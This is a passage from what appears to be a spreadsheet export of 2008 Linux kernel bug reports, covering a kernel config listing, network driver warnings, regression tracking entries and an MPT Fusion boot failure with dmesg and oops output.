CONFIG_ELF_CORE=y CONFIG_PCSPKR_PLATFORM=y CONFIG_COMPAT_BRK=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_ANON_INODES=y CONFIG_EPOLL=y CONFIG_SIGNALFD=y CONFIG_TIMERFD=y CONFIG_EVENTFD=y CONFIG_SHMEM=y CONFIG_VM_EVENT_COUNTERS=y CONFIG_SLUB_DEBUG=y CONFIG_SLUB=y CONFIG_HAVE_OPROFILE=y CONFIG_HAVE_KPROBES=y CONFIG_HAVE_KRETPROBES=y CONFIG_USE_GENERIC_SMP_HELPERS=y CONFIG_PROC_PAGE_MONITOR=y CONFIG_SLABINFO=y CONFIG_RT_MUTEXES=y CONFIG_BASE_SMALL=0 CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_KMOD=y CONFIG_STOP_MACHINE=y CONFIG_BLOCK=y CONFIG_BLOCK_COMPAT=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_CFQ=y CONFIG_DEFAULT_CFQ=y CONFIG_DEFAULT_IOSCHED="cfq" CONFIG_CLASSIC_RCU=y CONFIG_TICK_ONESHOT=y CONFIG_NO_HZ=y CONFIG_HIGH_RES_TIMERS=y CONFIG_GENERIC_CLOCKEVENTS_BUILD=y CONFIG_SMP=y CONFIG_X86_PC=y CONFIG_HAVE_ARCH_PARSE_SRAT=y CONFIG_MK8=y CONFIG_X86_CPU=y CONFIG_X86_L1_CACHE_BYTES=64 CONFIG_X86_INTERNODE_CACHE_BYTES=64 CONFIG_X86_CMPXCHG=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_TSC=y CONFIG_X86_CMPXCHG64=y CONFIG_X86_CMOV=y CONFIG_X86_MINIMUM_CPU_FAMILY=64 CONFIG_X86_DEBUGCTLMSR=y CONFIG_HPET_TIMER=y CONFIG_DMI=y CONFIG_GART_IOMMU=y CONFIG_SWIOTLB=y CONFIG_IOMMU_HELPER=y CONFIG_NR_CPUS=4 CONFIG_PREEMPT_VOLUNTARY=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_AMD=y CONFIG_X86_MSR=y CONFIG_X86_CPUID=y CONFIG_ARCH_SPARSEMEM_DEFAULT=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_ARCH_SELECT_MEMORY_MODEL=y CONFIG_ILLEGAL_POINTER_VALUE=0xffffc10000000000 CONFIG_SELECT_MEMORY_MODEL=y CONFIG_SPARSEMEM_MANUAL=y CONFIG_SPARSEMEM=y CONFIG_HAVE_MEMORY_PRESENT=y CONFIG_SPARSEMEM_EXTREME=y CONFIG_SPARSEMEM_VMEMMAP_ENABLE=y CONFIG_PAGEFLAGS_EXTENDED=y CONFIG_SPLIT_PTLOCK_CPUS=4 CONFIG_RESOURCES_64BIT=y CONFIG_ZONE_DMA_FLAG=1 CONFIG_BOUNCE=y CONFIG_VIRT_TO_BUS=y CONFIG_MTRR=y CONFIG_MTRR_SANITIZER=y CONFIG_MTRR_SANITIZER_ENABLE_DEFAULT=0 CONFIG_MTRR_SANITIZER_SPARE_REG_NR_DEFAULT=1 CONFIG_X86_PAT=y CONFIG_SECCOMP=y CONFIG_HZ_300=y CONFIG_HZ=300 CONFIG_SCHED_HRTICK=y CONFIG_PHYSICAL_START=0x200000 CONFIG_PHYSICAL_ALIGN=0x200000 CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y CONFIG_PM=y CONFIG_ACPI=y CONFIG_ACPI_DOCK=y CONFIG_ACPI_BLACKLIST_YEAR=0 CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y CONFIG_CPU_IDLE=y CONFIG_CPU_IDLE_GOV_LADDER=y CONFIG_CPU_IDLE_GOV_MENU=y CONFIG_PCI=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y CONFIG_PCI_DOMAINS=y CONFIG_DMAR=y CONFIG_DMAR_FLOPPY_WA=y CONFIG_PCIEPORTBUS=y CONFIG_PCIEAER=y CONFIG_ARCH_SUPPORTS_MSI=y CONFIG_PCI_MSI=y CONFIG_HT_IRQ=y CONFIG_ISA_DMA_API=y CONFIG_K8_NB=y CONFIG_BINFMT_ELF=y CONFIG_COMPAT_BINFMT_ELF=y CONFIG_IA32_EMULATION=y CONFIG_COMPAT=y CONFIG_COMPAT_FOR_U64_ALIGNMENT=y CONFIG_SYSVIPC_COMPAT=y CONFIG_NET=y CONFIG_PACKET=y CONFIG_PACKET_MMAP=y CONFIG_UNIX=y CONFIG_INET=y CONFIG_IP_FIB_HASH=y CONFIG_TCP_CONG_CUBIC=y CONFIG_DEFAULT_TCP_CONG="cubic" CONFIG_UEVENT_HELPER_PATH="/sbin/hotplug" CONFIG_STANDALONE=y CONFIG_FW_LOADER=y CONFIG_EXTRA_FIRMWARE="" CONFIG_PNP=y CONFIG_PNPACPI=y CONFIG_BLK_DEV=y CONFIG_HAVE_IDE=y CONFIG_SCSI=y CONFIG_SCSI_DMA=y CONFIG_SCSI_PROC_FS=y CONFIG_BLK_DEV_SD=y CONFIG_BLK_DEV_SR=y CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=y CONFIG_SCSI_WAIT_SCAN=m CONFIG_ATA=y CONFIG_SATA_AHCI=y CONFIG_ATA_SFF=y CONFIG_SATA_NV=y CONFIG_PATA_AMD=y CONFIG_NETDEVICES=y CONFIG_NET_ETHERNET=y CONFIG_MII=y CONFIG_NET_TULIP=y CONFIG_NET_PCI=y CONFIG_FORCEDETH=y CONFIG_FORCEDETH_NAPI=y CONFIG_NETCONSOLE=y CONFIG_NETCONSOLE_DYNAMIC=y CONFIG_NETPOLL=y CONFIG_NETPOLL_TRAP=y CONFIG_NET_POLL_CONTROLLER=y CONFIG_INPUT=y CONFIG_INPUT_FF_MEMLESS=y CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_INPUT_EVDEV=y CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_MOUSE_PS2_ALPS=y CONFIG_MOUSE_PS2_LOGIPS2PP=y CONFIG_MOUSE_PS2_SYNAPTICS=y CONFIG_MOUSE_PS2_LIFEBOOK=y CONFIG_MOUSE_PS2_TRACKPOINT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_LIBPS2=y CONFIG_VT=y CONFIG_CONSOLE_TRANSLATIONS=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_FIX_EARLYCON_MEM=y CONFIG_UNIX98_PTYS=y CONFIG_DEVPORT=y CONFIG_SSB_POSSIBLE=y CONFIG_AGP=y CONFIG_AGP_AMD64=y CONFIG_VGA_CONSOLE=y CONFIG_DUMMY_CONSOLE=y CONFIG_HID_SUPPORT=y CONFIG_HID=y CONFIG_USB_HID=y CONFIG_USB_SUPPORT=y CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_ARCH_HAS_OHCI=y CONFIG_USB_ARCH_HAS_EHCI=y CONFIG_USB=y CONFIG_USB_EHCI_HCD=y CONFIG_USB_OHCI_HCD=y CONFIG_USB_OHCI_LITTLE_ENDIAN=y CONFIG_EDAC=y CONFIG_EDAC_DEBUG=y CONFIG_EDAC_MM_EDAC=y CONFIG_REISERFS_FS=y CONFIG_DNOTIFY=y CONFIG_INOTIFY=y CONFIG_INOTIFY_USER=y CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_PROC_SYSCTL=y CONFIG_SYSFS=y CONFIG_TMPFS=y CONFIG_HUGETLBFS=y CONFIG_HUGETLB_PAGE=y CONFIG_CONFIGFS_FS=y CONFIG_NETWORK_FILESYSTEMS=y CONFIG_NFS_FS=y CONFIG_NFS_V3=y CONFIG_NFSD=y CONFIG_NFSD_V3=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y CONFIG_NFS_COMMON=y CONFIG_SUNRPC=y CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y CONFIG_NLS_DEFAULT="utf8" CONFIG_NLS_CODEPAGE_437=y CONFIG_NLS_ASCII=y CONFIG_NLS_ISO8859_1=y CONFIG_NLS_UTF8=y CONFIG_TRACE_IRQFLAGS_SUPPORT=y CONFIG_PRINTK_TIME=y CONFIG_FRAME_WARN=2048 CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_FS=y CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_SHIRQ=y CONFIG_DETECT_SOFTLOCKUP=y CONFIG_BOOTPARAM_SOFTLOCKUP_PANIC_VALUE=0 CONFIG_SCHED_DEBUG=y CONFIG_SLUB_DEBUG_ON=y CONFIG_DEBUG_RT_MUTEXES=y CONFIG_DEBUG_PI_LIST=y CONFIG_DEBUG_SPINLOCK=y CONFIG_DEBUG_MUTEXES=y CONFIG_DEBUG_LOCK_ALLOC=y CONFIG_PROVE_LOCKING=y CONFIG_LOCKDEP=y CONFIG_DEBUG_LOCKDEP=y CONFIG_TRACE_IRQFLAGS=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_STACKTRACE=y CONFIG_DEBUG_BUGVERBOSE=y CONFIG_DEBUG_INFO=y CONFIG_DEBUG_VM=y CONFIG_DEBUG_WRITECOUNT=y CONFIG_DEBUG_LIST=y CONFIG_DEBUG_SG=y CONFIG_FRAME_POINTER=y CONFIG_HAVE_FTRACE=y CONFIG_HAVE_DYNAMIC_FTRACE=y CONFIG_HAVE_ARCH_KGDB=y CONFIG_EARLY_PRINTK=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_STACK_USAGE=y CONFIG_DEBUG_PAGEALLOC=y CONFIG_DEBUG_PER_CPU_MAPS=y CONFIG_DEBUG_RODATA=y CONFIG_IO_DELAY_TYPE_0X80=0 CONFIG_IO_DELAY_TYPE_0XED=1 CONFIG_IO_DELAY_TYPE_UDELAY=2 CONFIG_IO_DELAY_TYPE_NONE=3 CONFIG_IO_DELAY_0X80=y CONFIG_DEFAULT_IO_DELAY_TYPE=0 CONFIG_HAVE_KVM=y CONFIG_BITREVERSE=y CONFIG_GENERIC_FIND_FIRST_BIT=y CONFIG_GENERIC_FIND_NEXT_BIT=y CONFIG_CRC32=y CONFIG_ZLIB_INFLATE=y CONFIG_PLIST=y CONFIG_HAS_IOMEM=y CONFIG_HAS_IOPORT=y CONFIG_HAS_DMA=y</t>
  </si>
  <si>
    <t>atl1 tx busy and hw csum wrong</t>
  </si>
  <si>
    <t>2.6.24-1-amd64</t>
  </si>
  <si>
    <t>2008-07-05 03:54 UTC</t>
  </si>
  <si>
    <t>2008-10-11 11:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian amd64 lenny Hardware Environment: Ethernet controller: Attansic Technology Corp. L1 Gigabit Ethernet Adapter (rev b0) Software Environment: atl1 module Problem Description: dmesg get flooded on irregular intervals by atl1 0000:01:00.0: tx busy and atl1 0000:01:00.0: hw csum wrong, pkt_flag:1600, err_flag:80 There aren't any visibile problems with it. eth0 Link encap:Ethernet HWaddr 00:1e:8c:a9:bf:11 inet addr:192.168.66.2 Bcast:192.168.66.255 Mask:255.255.255.0 inet6 addr: fe80::21e:8cff:fea9:bf11/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:80176035 errors:0 dropped:0 overruns:0 frame:0 TX packets:75185297 errors:0 dropped:0 overruns:0 carrier:17 collisions:0 txqueuelen:1000 RX bytes:76786214500 (71.5 GiB) TX bytes:57132572737 (53.2 GiB) Steps to reproduce: don't know exactly, probably under high network load.</t>
  </si>
  <si>
    <t>2.6.28-rc8-git3 forcedeth WARNING (kills the interface)</t>
  </si>
  <si>
    <t>2.6.28-rc8-git3</t>
  </si>
  <si>
    <t>2008-07-05 13:07 UTC</t>
  </si>
  <si>
    <t>2010-09-03 08:04 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc8-git3 forcedeth WARNING (kills the interface) Submitter : Brad Campbell &lt;brad@wasp.net.au&gt; Date : 2008-07-03 10:07 References : http://marc.info/?l=linux-netdev&amp;m=121508714430752&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pata_pdc2027x: 2.6.26-rc: host can not shutdown: ata problem</t>
  </si>
  <si>
    <t>2008-07-05 13:41 UTC</t>
  </si>
  <si>
    <t>2010-08-16 19:00 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc: host can not shutdown: ata problem Submitter : "Alexander Beregalov" &lt;a.beregalov@gmail.com&gt; Date : 2008-07-03 21:43 References : http://marc.info/?l=linux-kernel&amp;m=121512197225068&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>All 2.6.26-rcX hang immediately after loading ohci_hcd</t>
  </si>
  <si>
    <t>2008-07-05 13:43 UTC</t>
  </si>
  <si>
    <t>2008-07-06 14:57 UTC</t>
  </si>
  <si>
    <t>Subject : All 2.6.26-rcX hang immediately after loading ohci_hcd Submitter : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; Date : 2008-07-05 7:08 References : http://marc.info/?l=linux-kernel&amp;m=121524504505805&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>build issue #477 for v2.6.26-rc8-290-gb8a0b6c : input_event" [drivers/media/dvb/ttpci/dvb-ttpci.ko] undefined!</t>
  </si>
  <si>
    <t>2.6.26-rc8-290-gb8a0b6c</t>
  </si>
  <si>
    <t>2008-07-05 13:59 UTC</t>
  </si>
  <si>
    <t>2008-07-21 01:38 UTC</t>
  </si>
  <si>
    <t>Subject : build issue #477 for v2.6.26-rc8-290-gb8a0b6c : input_event" [drivers/media/dvb/ttpci/dvb-ttpci.ko] undefined! Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-07-05 15:25 References : http://marc.info/?l=linux-kernel&amp;m=121527158632563&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Bug in MPT Fusion 2.6.26-rc7 unbootable</t>
  </si>
  <si>
    <t>2008-07-06 11:22 UTC</t>
  </si>
  <si>
    <t>Kurk</t>
  </si>
  <si>
    <t>2008-07-16 13:40 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26-rc7 Distribution: Debian (but vanilla kernel) Hardware Environment: IBM xSeries 335 Software Environment: error and hangup at boot Problem Description: MPT Fusion error, unbootable, see below Steps to reproduce: see below ---- Detailed description: Hi all, I'm no kernel expert, I hope I made no mistakes in this report. It seems to me that a bug was added to the MPT Fusion driver in 2.6.26 (rc7). I compiled 2.6.26-rc7 on a machine with controller LSI53C1080 and it cannot boot. Doing the same with 2.6.25, basically the same config file, boots without problems. I tried to forward-port the Fusion driver from 2.6.25 to 2.6.26-rc7 by simply copying over the directory drivers/message/fusion/ from 2.6.25 to 2.6.26-rc7 but unfortunately this doesn't compile, so I am stuck not being able to use 2.6.26 on this machine (actually I have not tried versions of 2.6.26 earlier than rc7... I don't have much time now). I connected a serial cable in order to obtain the boot error message. I obtained two of those on different boots. I will paste these at the end of this post. This is the verbose lspci of the controller (obtained with 2.6.25): ---------------------------------------- 01:01.0 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 07) Subsystem: IBM Unknown device 026d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 72 (4250ns min, 4500ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 22 Region 0: I/O ports at 2300 [size=256] Region 1: Memory at fbff0000 (64-bit, non-prefetchable) [size=64K] Region 3: Memory at fbfe0000 (64-bit, non-prefetchable) [size=64K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [68] PCI-X non-bridge device Command: DPERE- ERO- RBC=512 OST=1 Status: Dev=01:01.0 64bit+ 133MHz+ SCD- USC- DC=simple DMMRBC=2048 DMOST=8 DMCRS=16 RSCEM- 266MHz- 533MHz- Kernel driver in use: mptspi Kernel modules: mptspi ---------------------------------------- This is an excerpt of the dmesg on 2.6.25 where the controller WORKS: -------------------------------------------------------------------- Fusion MPT base driver 3.04.06 Copyright (c) 1999-2007 LSI Corporation Fusion MPT SPI Host driver 3.04.06 ... mptbase: ioc0: Initiating bringup ... ioc0: LSI53C1030 B2: Capabilities={Initiator} Probing IDE interface ide1... hdc: LG CD-ROM CRN-8245B, ATAPI CD/DVD-ROM drive scsi0 : ioc0: LSI53C1030 B2, FwRev=01000e00h, Ports=1, MaxQ=222, IRQ=22 ... scsi0 : ioc0: LSI53C1030 B2, FwRev=01000e00h, Ports=1, MaxQ=222, IRQ=22 hdc: host max PIO4 wanted PIO255(auto-tune) selected PIO4 hdc: UDMA/33 mode selected ide1 at 0x170-0x177,0x376 on irq 15 tg3.c:v3.90 (April 12, 2008) ACPI: PCI Interrupt 0000:02:01.0[A] -&gt; GSI 24 (level, low) -&gt; IRQ 24 scsi 0:0:0:0: Direct-Access IBM-ESXS DTN018C1UCDY10F S23J PQ: 0 ANSI: 3 target0:0:0: Beginning Domain Validation target0:0:0: Ending Domain Validation target0:0:0: FAST-80 WIDE SCSI 160.0 MB/s DT (12.5 ns, offset 127) scsi 0:0:1:0: Direct-Access IBM-ESXS DTN018C1UCDY10F S23J PQ: 0 ANSI: 3 target0:0:1: Beginning Domain Validation ... ACPI: PCI Interrupt 0000:02:02.0[A] -&gt; GSI 25 (level, low) -&gt; IRQ 25 target0:0:1: Ending Domain Validation target0:0:1: FAST-80 WIDE SCSI 160.0 MB/s DT (12.5 ns, offset 127) ... hdc: ATAPI 24X CD-ROM drive, 128kB Cache Uniform CD-ROM driver Revision: 3.20 scsi 0:0:8:0: Processor IBM 25P3495a S320 1 1 PQ: 0 ANSI: 2 target0:0:8: Beginning Domain Validation target0:0:8: Ending Domain Validation target0:0:8: asynchronous Driver 'sd' needs updating - please use bus_type methods sd 0:0:0:0: [sda] 35548320 512-byte hardware sectors (18201 MB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: cb 00 00 08 sd 0:0:0:0: Attached scsi generic sg0 type 0 scsi 0:0:1:0: Attached scsi generic sg1 type 0 scsi 0:0:8:0: Attached scsi generic sg2 type 3 -------------------------------------------------------------------- It is an x86 32bit PC compile. This is the excerpt of the .config file grepping for FUSION ------------------------------------ CONFIG_FUSION=y CONFIG_FUSION_SPI=m CONFIG_FUSION_FC=m CONFIG_FUSION_SAS=m CONFIG_FUSION_MAX_SGE=40 CONFIG_FUSION_CTL=m CONFIG_FUSION_LAN=m # CONFIG_FUSION_LOGGING is not set ------------------------------------ This is the boot error message obtained with serial cable. I left it running for 8 minutes for this. It loops so the message never ends. -------------------------------------------------------------------- ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry ACPI: Resource is not an IRQ entry mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! BUG: unable to handle kernel NULL pointer dereference at 0000034c IP: [&lt;f885cc5e&gt;] :mptspi:mptspi_dv_renegotiate_work+0xa/0x9f Oops: 0000 [#1] SMP Modules linked in: ide_pci_generic(+) floppy mptspi(+) mptscsih ohci_hcd tg3 mptbase scsi_transport_spi usbcore serverworks ide_core ata_generic libata scsi_mod dock thermal processor fan thermal_sys Pid: 9, comm: events/0 Not tainted (2.6.26-rc7 #1) EIP: 0060:[&lt;f885cc5e&gt;] EFLAGS: 00010282 CPU: 0 EIP is at mptspi_dv_renegotiate_work+0xa/0x9f [mptspi] EAX: f7a447c0 EBX: f7429900 ECX: f7a447c4 EDX: c1908988 ESI: f7a447c0 EDI: 0000034c EBP: f7429904 ESP: f7477f80 DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Process events/0 (pid: 9, ti=f7476000 task=f744d770 task.ti=f7476000) Stack: f744d8e0 c190b260 00000000 c1908984 f7429900 f7a447c0 f885cc54 f7429904 c012f253 f7429900 c012f934 f742990c 00000000 c012f9e8 00000000 f744d770 c0131bdc f7477fc4 f7477fc4 f7429900 c012f934 00000000 c0131b1b c0131ae3 Call Trace: [&lt;f885cc54&gt;] mptspi_dv_renegotiate_work+0x0/0x9f [mptspi] [&lt;c012f253&gt;] run_workqueue+0x75/0xf6 [&lt;c012f934&gt;] worker_thread+0x0/0xbf [&lt;c012f9e8&gt;] worker_thread+0xb4/0xbf [&lt;c0131bdc&gt;] autoremove_wake_function+0x0/0x2b [&lt;c012f934&gt;] worker_thread+0x0/0xbf [&lt;c0131b1b&gt;] kthread+0x38/0x5d [&lt;c0131ae3&gt;] kthread+0x0/0x5d [&lt;c0104573&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: 70 e8 9e f8 ff ff 8b 47 70 e8 44 b7 fe ff 8b 47 70 5a 5b 5e 5f 5d e9 89 f8 ff ff 58 5b 5e 5f 5d c3 55 57 56 53 83 ec 10 8b 78 10 &lt;8b&gt; 2f e8 c7 98 90 c7 66 83 bf 96 02 00 00 00 8b 85 3c 01 00 00 EIP: [&lt;f885cc5e&gt;] mptspi_dv_renegotiate_work+0xa/0x9f [mptspi] SS:ESP 0068:f7477f80 ---[ end trace e311270f757682e4 ]--- mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT scsi0 : ioc0: LSI53C1030 B2, FwRev=01000e00h, Ports=1, MaxQ=222, IRQ=223 target0:0:0: mptspi: ioc0: dma_alloc_coherent for parameters failed hdc: ATAPI 24X CD-ROM drive, 128kB Cache Uniform CD-ROM driver Revision: 3.20 mptscsih: ioc0: attempting task abort! (sc=f7862e80) scsi 0:0:0:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=1: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h md: raid1 personality registered for level 1 device-mapper: ioctl: 4.13.0-ioctl (2007-10-18) initialised: dm-devel@redhat.com mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! scsi 0:0:0:0: mptscsih: ioc0: completing cmds: fw_channel 0, fw_id 0, sc=f7862e80, mf = f7a62da0, idx=f mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: task abort: FAILED (sc=f7862e80) mptscsih: ioc0: attempting target reset! (sc=f7862e80) scsi 0:0:0:0: CDB: Inquiry: 12 00 00 00 24 00 target0:0:0: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:0: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:0: mptspi: ioc0: dma_alloc_coherent for parameters failed mptscsih: ioc0: Issue of TaskMgmt failed! mptscsih: ioc0: target reset: FAILED (sc=f7862e80) mptscsih: ioc0: attempting bus reset! (sc=f7862e80) scsi 0:0:0:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=4: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: bus reset: FAILED (sc=f7862e80) mptscsih: ioc0: attempting host reset! (sc=f7862e80) mptbase: ioc0: Initiating recovery target0:0:0: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:0: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:0: mptspi: ioc0: dma_alloc_coherent for parameters failed mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptscsih: ioc0: host reset: SUCCESS (sc=f7862e80) scsi 0:0:0:0: Device offlined - not ready after error recovery target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:1: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed mptscsih: ioc0: attempting task abort! (sc=f7862e80) scsi 0:0:1:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=1: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! scsi 0:0:1:0: mptscsih: ioc0: completing cmds: fw_channel 0, fw_id 1, sc=f7862e80, mf = f7a62f80, idx=14 mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: task abort: FAILED (sc=f7862e80) mptscsih: ioc0: attempting target reset! (sc=f7862e80) scsi 0:0:1:0: CDB: Inquiry: 12 00 00 00 24 00 target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed target0:0:1: FAST-5 WIDE SCSI 2.4 MB/s ST RTI WRFLOW PCOMP (844 ns, offset 68) target0:0:1: mptspi: ioc0: dma_alloc_coherent for parameters failed mptscsih: ioc0: Issue of TaskMgmt failed! mptscsih: ioc0: target reset: FAILED (sc=f7862e80) mptscsih: ioc0: attempting bus reset! (sc=f7862e80) scsi 0:0:1:0: CDB: Inquiry: 12 00 00 00 24 00 mptscsih: ioc0: WARNING - TM Handler for type=4: IOC Not operational (0x40008112)! mptscsih: ioc0: WARNING - Issuing HardReset!! mptbase: ioc0: Initiating recovery mptbase: ioc0: WARNING - IOC is in FAULT state!!! mptbase: ioc0: WARNING - FAULT code = 8112h mptbase: ioc0: ERROR - Doorbell ACK timeout (count=4999), IntStatus=80000009! mptbase: ioc0: Recovered from IOC FAULT mptscsih: ioc0: bus reset: FAILED (sc=f7862e80) mptscsih: ioc0: attempting host reset! (sc=f7862e80) mptbase: 